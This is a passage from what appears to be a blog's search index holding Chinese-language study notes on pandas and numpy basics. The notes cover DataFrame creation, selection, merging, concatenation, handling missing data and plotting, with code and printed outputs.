    1 K0 K1 A1 B1 NaN NaN
    2 K1 K0 A2 B2 C1 D1
    3 K1 K0 A2 B2 C2 D2
    4 K2 K1 A3 B3 NaN NaN
    pd.merge(left, right, on=['key1', 'key2'], how='right', indicator=True) # indicator 显示合并的方式
    key1 key2 A B C D _merge
    0 K0 K0 A0 B0 C0 D0 both
    1 K1 K0 A2 B2 C1 D1 both
    2 K1 K0 A2 B2 C2 D2 both
    3 K2 K0 NaN NaN C3 D3 right_only
    pd.merge(left, right, on=['key1', 'key2'], how='right', indicator="indicator_column") # indicator 显示合并的方式
    key1 key2 A B C D indicator_column
    0 K0 K0 A0 B0 C0 D0 both
    1 K1 K0 A2 B2 C1 D1 both
    2 K1 K0 A2 B2 C2 D2 both
    3 K2 K0 NaN NaN C3 D3 right_only
    pd.merge(left, right, left_index=True, right_index=True, how='outer')
    key1_x key2_x A B key1_y key2_y C D
    0 K0 K0 A0 B0 K0 K0 C0 D0
    1 K0 K1 A1 B1 K1 K0 C1 D1
    2 K1 K0 A2 B2 K1 K0 C2 D2
    3 K2 K1 A3 B3 K2 K0 C3 D3

    处理合并造成的重复问题

    boys = pd.DataFrame({'k': ['K0', 'K1', 'K2'], 'age': [1, 2, 3]})
    girls = pd.DataFrame({'k': ['K0', 'K1', 'K2'], 'age': [4, 5, 6]})
    boys
    k age
    0 K0 1
    1 K1 2
    2 K2 3
    girls
    k age
    0 K0 4
    1 K1 5
    2 K2 6
    pd.merge(boys, girls, on='k', suffixes=['_boy', '_girl'], how='inner')
    k age_boy age_girl
    0 K0 1 4
    1 K1 2 5
    2 K2 3 6

    3.8 pandas plot 画图

    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    0       0.6824041       1.8339472       2.6398843       1.8432264       3.675730         ...    995    72.472419996    70.507220997    70.897704998    71.912970999    71.542112Length: 1000, dtype: float64

    Series 折线图

    data = pd.Series(np.random.randn(1000), index=np.arange(1000)).cumsum()
    data
    0      -1.2873301      -1.2938982      -0.1667983      -1.1774144      -1.890751         ...    995    10.204522996    10.308410997     7.887580998     8.327458999     9.105820Length: 1000, dtype: float64
    data.plot()
    plt.show()

    png

    DataFrame 折线图

    data = pd.DataFrame(np.random.randn(1000, 4), index=np.arange(1000), columns=list('ABCD')).cumsum()
    data
    A B C D
    0 0.020454 -1.172689 1.843716 1.544707
    1 -0.097744 0.989506 1.068073 2.404901
    2 -0.273196 0.758510 -1.905761 3.836764
    3 0.401259 1.408281 -2.043875 3.762166
    4 1.821346 0.941836 -1.549852 4.347704
    ... ... ... ... ...
    995 -4.775217 -18.948179 -47.410079 -53.719370
    996 -3.830409 -19.661865 -46.040664 -54.201339
    997 -3.061518 -20.368645 -46.068266 -54.682348
    998 -3.447858 -21.113475 -46.808006 -54.889304
    999 -2.270221 -21.544267 -46.512128 -54.953465

    1000 rows × 4 columns

    data.plot()
    plt.show()

    png

    plot 的方法:bar 条形图,hist,box,kde,area,scatter,hexbin,pie……

    ax = data.plot.scatter(x='A', y='B', color='DarkBlue', label='Class1')
    data.plot.scatter(x='A', y='C', color='DarkGreen', label='Class2', ax=ax)
    plt.show()

    png

    ]]>
    + 正文

    3.1 pandas 基本介绍

    如果把 numpy 比作列表,pandas 可以比作字典

    1
    2
    import pandas as pd
    import numpy as np

    创建 pandas 序列

    1
    pd.Series([1, 3, 6, np.nan, 44, 1]) # np.nan 相当于 None
    0     1.01     3.02     6.03     NaN4    44.05     1.0dtype: float64

    创建一个日期序列

    1
    2
    dates = pd.date_range('20160101', periods=6)
    dates
    DatetimeIndex(['2016-01-01', '2016-01-02', '2016-01-03', '2016-01-04',               '2016-01-05', '2016-01-06'],              dtype='datetime64[ns]', freq='D')

    生成数据表格, pd.DataFrame(数据, 索引, 标题列表)

    1
    pd.DataFrame(np.random.randn(6, 4), index=dates, columns=['a', 'b', 'c', 'd'])
    a b c d
    2016-01-01 0.014513 0.490584 -1.985363 -1.734158
    2016-01-02 1.694216 0.383375 -1.260541 -0.126581
    2016-01-03 0.475547 1.050239 0.897093 1.155942
    2016-01-04 0.126726 -1.169920 -1.876652 -1.245558
    2016-01-05 0.606119 0.648469 -1.367697 -0.822617
    2016-01-06 -0.615075 0.557680 -2.104794 0.114070

    默认生成的数据表格

    1
    pd.DataFrame(np.arange(12).reshape((3, 4)))
    0 1 2 3
    0 0 1 2 3
    1 4 5 6 7
    2 8 9 10 11

    用字典代替要输入的值

    1
    2
    3
    4
    5
    6
    7
    df = pd.DataFrame({'A': 1,
    'B': pd.Timestamp('20130102'),
    'C': pd.Series(1, index=list(range(4)), dtype='float32'),
    'D': np.array([3] * 4, dtype='int32'),
    'E': pd.Categorical(["test", "train", "test", "train"]),
    'F': 'foo'})
    df
    A B C D E F
    0 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    2 1 2013-01-02 1.0 3 test foo
    3 1 2013-01-02 1.0 3 train foo

    输出表格的类型

    1
    df.dtypes
    A             int64B    datetime64[ns]C           float32D             int32E          categoryF            objectdtype: object

    输出表格的索引

    1
    df.index
    Int64Index([0, 1, 2, 3], dtype='int64')

    输出表格的行名

    1
    df.columns
    Index(['A', 'B', 'C', 'D', 'E', 'F'], dtype='object')

    输出表格每行的数据

    1
    df.values
    array([[1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'test', 'foo'],       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'train', 'foo'],       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'test', 'foo'],       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'train', 'foo']],      dtype=object)

    输出表格每行的数据特征

    1
    df.describe()
    A C D
    count 4.0 4.0 4.0
    mean 1.0 1.0 3.0
    std 0.0 0.0 0.0
    min 1.0 1.0 3.0
    25% 1.0 1.0 3.0
    50% 1.0 1.0 3.0
    75% 1.0 1.0 3.0
    max 1.0 1.0 3.0

    转置表格

    1
    df.T
    0 1 2 3
    A 1 1 1 1
    B 2013-01-02 00:00:00 2013-01-02 00:00:00 2013-01-02 00:00:00 2013-01-02 00:00:00
    C 1.0 1.0 1.0 1.0
    D 3 3 3 3
    E test train test train
    F foo foo foo foo

    排序表格

    1
    df.sort_index(axis=1, ascending=False) # 以行排序,倒序
    F E D C B A
    0 foo test 3 1.0 2013-01-02 1
    1 foo train 3 1.0 2013-01-02 1
    2 foo test 3 1.0 2013-01-02 1
    3 foo train 3 1.0 2013-01-02 1
    1
    df.sort_index(axis=0, ascending=False)
    A B C D E F
    3 1 2013-01-02 1.0 3 train foo
    2 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    0 1 2013-01-02 1.0 3 test foo
    1
    df.sort_values(by='E')
    A B C D E F
    0 1 2013-01-02 1.0 3 test foo
    2 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    3 1 2013-01-02 1.0 3 train foo

    3.2 pandas 选择数据

    1
    2
    3
    4
    5
    6
    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    df
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

    选择表格中 A 列的所有数据

    1
    df.A
    2013-01-01     02013-01-02     42013-01-03     82013-01-04    122013-01-05    162013-01-06    20Freq: D, Name: A, dtype: int32
    1
    df['A']
    2013-01-01     02013-01-02     42013-01-03     82013-01-04    122013-01-05    162013-01-06    20Freq: D, Name: A, dtype: int32

    选择表格中某些行中所有的数据

    1
    df[0:3]
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    1
    df['20130102':'20130104']
    A B C D
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15

    根据标签选择数据

    1
    df.loc['20130102']
    A    4B    5C    6D    7Name: 2013-01-02 00:00:00, dtype: int32
    1
    df.loc[:, ['A', 'B']]
    A B
    2013-01-01 0 1
    2013-01-02 4 5
    2013-01-03 8 9
    2013-01-04 12 13
    2013-01-05 16 17
    2013-01-06 20 21
    1
    df.loc['20130102', ['A', 'B']]
    A    4B    5Name: 2013-01-02 00:00:00, dtype: int32

    根据位置选择数据

    1
    df.iloc[3]
    A    12B    13C    14D    15Name: 2013-01-04 00:00:00, dtype: int32
    1
    df.iloc[3, 1]
    13
    1
    df.iloc[3:5, 1:3]
    B C
    2013-01-04 13 14
    2013-01-05 17 18
    1
    df.iloc[[1, 3, 5], 1:3]
    B C
    2013-01-02 5 6
    2013-01-04 13 14
    2013-01-06 21 22

    混合选择表格中的数据

    1
    df.ix[:3, ['A', 'C']] # 高版本中已不推荐使用
    ---------------------------------------------------------------------------AttributeError                            Traceback (most recent call last)Input In [27], in <cell line: 1>()----> 1 df.ix[:3, ['A', 'C']]File ~\anaconda3\lib\site-packages\pandas\core\generic.py:5575, in NDFrame.__getattr__(self, name)   5568 if (   5569     name not in self._internal_names_set   5570     and name not in self._metadata   5571     and name not in self._accessors   5572     and self._info_axis._can_hold_identifiers_and_holds_name(name)   5573 ):   5574     return self[name]-> 5575 return object.__getattribute__(self, name)AttributeError: 'DataFrame' object has no attribute 'ix'

    是或否的筛选

    1
    df[df.A > 8] # 只对比 A,但是 ABCD 都会显示
    A B C D
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

    3.3pandas 设置值

    1
    2
    3
    4
    5
    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    1
    dates
    DatetimeIndex(['2013-01-01', '2013-01-02', '2013-01-03', '2013-01-04',               '2013-01-05', '2013-01-06'],              dtype='datetime64[ns]', freq='D')
    1
    df
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

    修改表格中的值

    1
    2
    3
    4
    5
    df.iloc[2, 2] = 1111
    df.loc['20130101', 'B'] = 2222
    df[df.A > 4] = 0
    df.B[df.A > 4] = 0
    df
    A B C D
    2013-01-01 0 2222 2 3
    2013-01-02 4 5 6 7
    2013-01-03 0 0 1111 0
    2013-01-04 0 0 0 0
    2013-01-05 0 0 0 0
    2013-01-06 0 0 0 0

    给表格中添加空的行

    1
    2
    df['F'] = np.nan
    df
    A B C D F
    2013-01-01 0 2222 2 3 NaN
    2013-01-02 4 5 6 7 NaN
    2013-01-03 0 0 1111 0 NaN
    2013-01-04 0 0 0 0 NaN
    2013-01-05 0 0 0 0 NaN
    2013-01-06 0 0 0 0 NaN
    1
    2
    df['E'] = pd.Series([1, 2, 3, 4, 5, 6], index=pd.date_range('20130101', periods=6))
    df
    A B C D F E
    2013-01-01 0 2222 2 3 NaN 1
    2013-01-02 4 5 6 7 NaN 2
    2013-01-03 0 0 1111 0 NaN 3
    2013-01-04 0 0 0 0 NaN 4
    2013-01-05 0 0 0 0 NaN 5
    2013-01-06 0 0 0 0 NaN 6

    3.4 pandas 处理丢失数据

    1
    2
    3
    4
    5
    6
    7
    8
    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    df.iloc[0, 1] = np.nan
    df.iloc[1, 2] = np.nan
    df
    A B C D
    2013-01-01 0 NaN 2.0 3
    2013-01-02 4 5.0 NaN 7
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

    丢弃 nan 数据

    1
    df.dropna(axis=0, how='any') # how = {'any', 'all'} 出现 nan/所有数据都是 nan 是才处理
    A B C D
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

    将 nan 数据更改为其他值

    1
    df.fillna(value=0)
    A B C D
    2013-01-01 0 0.0 2.0 3
    2013-01-02 4 5.0 0.0 7
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

    判断表格中是否有缺失数据

    1
    df.isna()
    A B C D
    2013-01-01 False True False False
    2013-01-02 False False True False
    2013-01-03 False False False False
    2013-01-04 False False False False
    2013-01-05 False False False False
    2013-01-06 False False False False
    1
    df.isnull()
    A B C D
    2013-01-01 False True False False
    2013-01-02 False False True False
    2013-01-03 False False False False
    2013-01-04 False False False False
    2013-01-05 False False False False
    2013-01-06 False False False False
    1
    np.any(df.isnull() is True) # 若返回 True,则说明表格中的确缺失数据
    False

    3.5 3D 数据

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    fig = plt.figure() # 新建一个 figure 窗口
    ax = Axes3D(fig, auto_add_to_figure=False) # 添加三维坐标轴
    fig.add_axes(ax)

    # 输入数据
    X = np.arange(-4, 4, 0.25)
    Y = np.arange(-4, 4, 0.25)
    X, Y = np.meshgrid(X, Y)
    R = np.sqrt(X ** 2 + Y ** 2)
    Z = np.sin(R)

    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
    ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap='rainbow')
    ax.set_zlim(-2, 2)

    plt.show()

    png

    3.6 pandas 合并 concat

    1
    2
    import pandas as pd 
    import numpy as np

    concatenating

    1
    2
    3
    df1 = pd.DataFrame(np.ones((3, 4)) * 0, columns=['a', 'b', 'c', 'd'])
    df2 = pd.DataFrame(np.ones((3, 4)) * 1, columns=['a', 'b', 'c', 'd'])
    df3 = pd.DataFrame(np.ones((3, 4)) * 2, columns=['a', 'b', 'c', 'd'])
    1
    df1
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    1
    df2
    a b c d
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0
    1
    df3
    a b c d
    0 2.0 2.0 2.0 2.0
    1 2.0 2.0 2.0 2.0
    2 2.0 2.0 2.0 2.0

    上下合并

    1
    pd.concat([df1, df2, df3], axis=0) # axis=0 竖向划分操作行,1 横向划分操作列
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0
    0 2.0 2.0 2.0 2.0
    1 2.0 2.0 2.0 2.0
    2 2.0 2.0 2.0 2.0
    1
    pd.concat([df1, df2, df3], axis=0, ignore_index=True) # 重新排序索引
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    3 1.0 1.0 1.0 1.0
    4 1.0 1.0 1.0 1.0
    5 1.0 1.0 1.0 1.0
    6 2.0 2.0 2.0 2.0
    7 2.0 2.0 2.0 2.0
    8 2.0 2.0 2.0 2.0

    join, [‘inner’, ‘outer’]

    1
    2
    3
    df1 = pd.DataFrame(np.ones((3, 4)) * 0, columns=['a', 'b', 'c', 'd'])
    df2 = pd.DataFrame(np.ones((3, 4)) * 1, columns=['b', 'c', 'd', 'e'])
    df1
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    1
    df2
    b c d e
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0

    直接合并出现的结果,会用 nan 填充

    1
    pd.concat([df1, df2], join='outer')
    a b c d e
    0 0.0 0.0 0.0 0.0 NaN
    1 0.0 0.0 0.0 0.0 NaN
    2 0.0 0.0 0.0 0.0 NaN
    0 NaN 1.0 1.0 1.0 1.0
    1 NaN 1.0 1.0 1.0 1.0
    2 NaN 1.0 1.0 1.0 1.0
    1
    pd.concat([df1, df2], join='inner') # 只会合并相同的部分
    b c d
    0 0.0 0.0 0.0
    1 0.0 0.0 0.0
    2 0.0 0.0 0.0
    0 1.0 1.0 1.0
    1 1.0 1.0 1.0
    2 1.0 1.0 1.0
    1
    pd.concat([df1, df2], join='inner', ignore_index=True)
    b c d
    0 0.0 0.0 0.0
    1 0.0 0.0 0.0
    2 0.0 0.0 0.0
    3 1.0 1.0 1.0
    4 1.0 1.0 1.0
    5 1.0 1.0 1.0

    按照索引进行合并

    1
    pd.concat([df1, df2], axis=1, join_axes=[df1.index])
    ---------------------------------------------------------------------------TypeError                                 Traceback (most recent call last)Input In [23], in <cell line: 1>()----> 1 pd.concat([df1, df2], axis=1, join_axes=[df1.index])File ~\anaconda3\lib\site-packages\pandas\util\_decorators.py:311, in deprecate_nonkeyword_arguments.<locals>.decorate.<locals>.wrapper(*args, **kwargs)    305 if len(args) > num_allow_args:    306     warnings.warn(    307msg.format(arguments=arguments),    308         FutureWarning,    309stacklevel=stacklevel,    310     )--> 311 return func(*args, **kwargs)TypeError: concat() got an unexpected keyword argument 'join_axes'

    append 将被移除,不推荐使用

    1
    df1.append([df2, df3])
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_10380\266511466.py:1: FutureWarning: The frame.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.  df1.append([df2, df3])
    a b c d e
    0 0.0 0.0 0.0 0.0 NaN
    1 0.0 0.0 0.0 0.0 NaN
    2 0.0 0.0 0.0 0.0 NaN
    0 NaN 1.0 1.0 1.0 1.0
    1 NaN 1.0 1.0 1.0 1.0
    2 NaN 1.0 1.0 1.0 1.0
    0 2.0 2.0 2.0 2.0 NaN
    1 2.0 2.0 2.0 2.0 NaN
    2 2.0 2.0 2.0 2.0 NaN

    3.7pandas 合并 merge

    1
    2
    3
    4
    5
    6
    7
    8
    import pandas as pd

    left = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3'],
    'A': ['A0', 'A1', 'A2', 'A3'],
    'B': ['B0', 'B1', 'B2', 'B3']})
    right = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3'],
    'C': ['C0', 'C1', 'C2', 'C3'],
    'D': ['D0', 'D1', 'D2', 'D3']})
    1
    left
    key A B
    0 K0 A0 B0
    1 K1 A1 B1
    2 K2 A2 B2
    3 K3 A3 B3
    1
    right
    key C D
    0 K0 C0 D0
    1 K1 C1 D1
    2 K2 C2 D2
    3 K3 C3 D3
    1
    pd.merge(left, right, on='key')
    key A B C D
    0 K0 A0 B0 C0 D0
    1 K1 A1 B1 C1 D1
    2 K2 A2 B2 C2 D2
    3 K3 A3 B3 C3 D3

    在有两个 key 的情况下

    1
    2
    3
    4
    5
    6
    7
    8
    9
    left = pd.DataFrame({'key1': ['K0', 'K0', 'K1', 'K2'],
    'key2': ['K0', 'K1', 'K0', 'K1'],
    'A': ['A0', 'A1', 'A2', 'A3'],
    'B': ['B0', 'B1', 'B2', 'B3']})
    right = pd.DataFrame({'key1': ['K0', 'K1', 'K1', 'K2'],
    'key2': ['K0', 'K0', 'K0', 'K0'],
    'C': ['C0', 'C1', 'C2', 'C3'],
    'D': ['D0', 'D1', 'D2', 'D3']})
    left
    key1 key2 A B
    0 K0 K0 A0 B0
    1 K0 K1 A1 B1
    2 K1 K0 A2 B2
    3 K2 K1 A3 B3
    1
    right
    key1 key2 C D
    0 K0 K0 C0 D0
    1 K1 K0 C1 D1
    2 K1 K0 C2 D2
    3 K2 K0 C3 D3
    1
    pd.merge(left, right, on=['key1', 'key2'], how='inner')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K1 K0 A2 B2 C1 D1
    2 K1 K0 A2 B2 C2 D2
    1
    pd.merge(left, right, on=['key1', 'key2'], how='outer')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K0 K1 A1 B1 NaN NaN
    2 K1 K0 A2 B2 C1 D1
    3 K1 K0 A2 B2 C2 D2
    4 K2 K1 A3 B3 NaN NaN
    5 K2 K0 NaN NaN C3 D3
    1
    pd.merge(left, right, on=['key1', 'key2'], how='left')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K0 K1 A1 B1 NaN NaN
    2 K1 K0 A2 B2 C1 D1
    3 K1 K0 A2 B2 C2 D2
    4 K2 K1 A3 B3 NaN NaN
    1
    pd.merge(left, right, on=['key1', 'key2'], how='right', indicator=True) # indicator 显示合并的方式
    key1 key2 A B C D _merge
    0 K0 K0 A0 B0 C0 D0 both
    1 K1 K0 A2 B2 C1 D1 both
    2 K1 K0 A2 B2 C2 D2 both
    3 K2 K0 NaN NaN C3 D3 right_only
    1
    pd.merge(left, right, on=['key1', 'key2'], how='right', indicator="indicator_column") # indicator 显示合并的方式
    key1 key2 A B C D indicator_column
    0 K0 K0 A0 B0 C0 D0 both
    1 K1 K0 A2 B2 C1 D1 both
    2 K1 K0 A2 B2 C2 D2 both
    3 K2 K0 NaN NaN C3 D3 right_only
    1
    pd.merge(left, right, left_index=True, right_index=True, how='outer')
    key1_x key2_x A B key1_y key2_y C D
    0 K0 K0 A0 B0 K0 K0 C0 D0
    1 K0 K1 A1 B1 K1 K0 C1 D1
    2 K1 K0 A2 B2 K1 K0 C2 D2
    3 K2 K1 A3 B3 K2 K0 C3 D3

    处理合并造成的重复问题

    1
    2
    3
    boys = pd.DataFrame({'k': ['K0', 'K1', 'K2'], 'age': [1, 2, 3]})
    girls = pd.DataFrame({'k': ['K0', 'K1', 'K2'], 'age': [4, 5, 6]})
    boys
    k age
    0 K0 1
    1 K1 2
    2 K2 3
    1
    girls
    k age
    0 K0 4
    1 K1 5
    2 K2 6
    1
    pd.merge(boys, girls, on='k', suffixes=['_boy', '_girl'], how='inner')
    k age_boy age_girl
    0 K0 1 4
    1 K1 2 5
    2 K2 3 6

    3.8 pandas plot 画图

    1
    2
    3
    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    0       0.6824041       1.8339472       2.6398843       1.8432264       3.675730         ...    995    72.472419996    70.507220997    70.897704998    71.912970999    71.542112Length: 1000, dtype: float64

    Series 折线图

    1
    2
    data = pd.Series(np.random.randn(1000), index=np.arange(1000)).cumsum()
    data
    0      -1.2873301      -1.2938982      -0.1667983      -1.1774144      -1.890751         ...    995    10.204522996    10.308410997     7.887580998     8.327458999     9.105820Length: 1000, dtype: float64
    1
    2
    data.plot()
    plt.show()

    png

    DataFrame 折线图

    1
    2
    data = pd.DataFrame(np.random.randn(1000, 4), index=np.arange(1000), columns=list('ABCD')).cumsum()
    data
    A B C D
    0 0.020454 -1.172689 1.843716 1.544707
    1 -0.097744 0.989506 1.068073 2.404901
    2 -0.273196 0.758510 -1.905761 3.836764
    3 0.401259 1.408281 -2.043875 3.762166
    4 1.821346 0.941836 -1.549852 4.347704
    ... ... ... ... ...
    995 -4.775217 -18.948179 -47.410079 -53.719370
    996 -3.830409 -19.661865 -46.040664 -54.201339
    997 -3.061518 -20.368645 -46.068266 -54.682348
    998 -3.447858 -21.113475 -46.808006 -54.889304
    999 -2.270221 -21.544267 -46.512128 -54.953465

    1000 rows × 4 columns

    1
    2
    data.plot()
    plt.show()

    png

    plot 的方法:bar 条形图,hist,box,kde,area,scatter,hexbin,pie……

    1
    2
    3
    ax = data.plot.scatter(x='A', y='B', color='DarkBlue', label='Class1')
    data.plot.scatter(x='A', y='C', color='DarkGreen', label='Class2', ax=ax)
    plt.show()

    png

    ]]>
    @@ -10293,7 +10293,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88numpy%EF%BC%89/ - 前言

    正文

    2.1numpy 属性

    导入 numpy 库,并简写为 np

    import numpy as np

    创建一个数组

    array = np.array([[1, 2, 3],
    [2, 3, 4]])

    打印数组

    print(array)
    [[1 2 3] [2 3 4]]

    打印数组的维度

    print(array.ndim)
    2

    打印数组的形状

    print(array.shape)
    (2, 3)

    打印数组的大小

    print(array.size)
    6

    2.2 numpy 的创建 array

    import numpy as np

    定义 array 的 dtype

    a = np.array([2, 23, 4], dtype = np.int64)

    打印数组类型

    print(a.dtype)
    int64

    定义零矩阵

    np.zeros((3, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.]])

    定义全为一的矩阵

    np.ones((3, 4))
    array([[1., 1., 1., 1.],       [1., 1., 1., 1.],       [1., 1., 1., 1.]])

    定义未初始化的矩阵

    如果之前未定义过矩阵,内容为十分接近于 0 的随机数,否则值与上一个定义过的矩阵内容一致

    np.empty((3, 4))
    array([[1., 1., 1., 1.],       [1., 1., 1., 1.],       [1., 1., 1., 1.]])

    定义有序的数列,np.arange(初始值,最终值,步长)

    np.arange(10, 20, 2)
    array([10, 12, 14, 16, 18])

    将一个有序数列转换为矩阵

    np.arange(12).reshape(3, 4)
    array([[ 0,  1,  2,  3],       [ 4,  5,  6,  7],       [ 8,  9, 10, 11]])

    生成线段,np.linspace(初始值,最终值,段数)

    np.linspace(1, 10, 5)
    array([ 1.  ,  3.25,  5.5 ,  7.75, 10.  ])

    生成线段,并把它改为矩阵

    np.linspace(1, 10, 6).reshape((2, 3))
    array([[ 1. ,  2.8,  4.6],       [ 6.4,  8.2, 10. ]])

    2.3 numpy 基础运算

    import numpy as np

    创建两个数组

    a = np.array([10, 20, 30, 40])
    b = np.arange(4)
    print(a)
    print(b)
    [10 20 30 40][0 1 2 3]

    数组相减

    a - b
    array([10, 19, 28, 37])

    数组乘方

    a ** b
    array([    1,    20,   900, 64000], dtype=int32)

    对于 a 的每个值,进行正弦运算

    np.sin(a)
    array([-0.54402111,  0.91294525, -0.98803162,  0.74511316])

    对 b 的每个数进行判断

    b < 3
    array([ True,  True,  True, False])
    b == 3
    array([False, False, False,  True])

    定义二维矩阵

    a = np.array([[1, 1],
    [0, 1]])
    b = b.reshape(2, 2)
    print(a)
    print(b)
    [[1 1] [0 1]][[0 1] [2 3]]

    矩阵逐个相乘

    a * b
    array([[0, 1],       [0, 3]])

    矩阵乘法

    np.dot(a, b)
    array([[2, 4],       [2, 3]])
    a.dot(b)
    array([[2, 4],       [2, 3]])

    创建随机生成矩阵,内容为 0 到 1 的随机数

    a = np.random.random((2, 4))
    print(a)
    [[0.8173095  0.68161518 0.69519572 0.38590121] [0.75305129 0.12209991 0.31815067 0.08084771]]

    矩阵求和

    np.sum(a)
    3.854171189705032

    矩阵最小值

    np.min(a)
    0.08084770650268369

    矩阵在第 1 维度(每一行)的求和

    np.sum(a, axis=1)
    array([2.58002161, 1.27414958])

    矩阵在每一列的求和

    np.sum(a, axis=0)
    array([1.57036079, 0.80371509, 1.01334639, 0.46674891])

    2.4 numpy 基础运算 2

    import numpy as np

    定义一个矩阵

    A = np.arange(2, 14).reshape((3, 4))
    print(A)
    [[ 2  3  4  5] [ 6  7  8  9] [10 11 12 13]]

    查询 A 中最小值的索引

    np.argmin(A)
    0

    查询 A 中最大值的索引

    np.argmax(A)
    11

    计算 A 的平均值

    np.mean(A)
    7.5
    A.mean()
    7.5
    np.average(A)
    7.5

    计算 A 的中位数

    np.median(A)
    7.5

    累加 A

    np.cumsum(A)
    array([ 2,  5,  9, 14, 20, 27, 35, 44, 54, 65, 77, 90], dtype=int32)

    累差 A(后一列减前一列)

    np.diff(A)
    array([[1, 1, 1],       [1, 1, 1],       [1, 1, 1]])

    找出 A 中所有非零的下标(行,列)

    np.nonzero(A)
    (array([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2], dtype=int64), array([0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3], dtype=int64))

    对 A 进行逐行排序

    A = np.arange(14, 2, -1).reshape((3, 4))
    print(A)
    [[14 13 12 11] [10  9  8  7] [ 6  5  4  3]]
    np.sort(A)
    array([[11, 12, 13, 14],       [ 7,  8,  9, 10],       [ 3,  4,  5,  6]])

    矩阵的转置

    A.T
    array([[14, 10,  6],       [13,  9,  5],       [12,  8,  4],       [11,  7,  3]])
    np.transpose(A)
    array([[14, 10,  6],       [13,  9,  5],       [12,  8,  4],       [11,  7,  3]])

    限制 A 的最小值和最大值

    np.clip(A, 5, 9)
    array([[9, 9, 9, 9],       [9, 9, 8, 7],       [6, 5, 5, 5]])

    对于矩阵 A 逐列求平均值

    np.mean(A, axis=0)
    array([10.,  9.,  8.,  7.])

    2.5 numpy 索引

    import numpy as np

    A = np.arange(3, 15)
    print(A)
    [ 3  4  5  6  7  8  9 10 11 12 13 14]

    查找 A 的第 3 个值

    A[3]
    6
    A = A.reshape((3, 4))
    print(A)
    [[ 3  4  5  6] [ 7  8  9 10] [11 12 13 14]]

    查找 A 的第 2 行

    print(A[2])
    [11 12 13 14]

    查找 A 的第 1 行第 1 列

    A[1][1]
    8
    A[1, 1]
    8

    查找 A 的第一列(用冒号代替所有的数)

    A[:, 1]
    array([ 4,  8, 12])

    查找 A 的第一行,第一列到第三列之间的数

    A[1, 1:3]
    array([8, 9])

    用 for 循环输出 A 的所有行

    for row in A:
    print(row)
    [3 4 5 6][ 7  8  9 10][11 12 13 14]

    输出 A 的所有列

    for col in A.T:
    print(col)
    [ 3  7 11][ 4  8 12][ 5  9 13][ 6 10 14]

    将 A 转换为序列

    A.flatten()
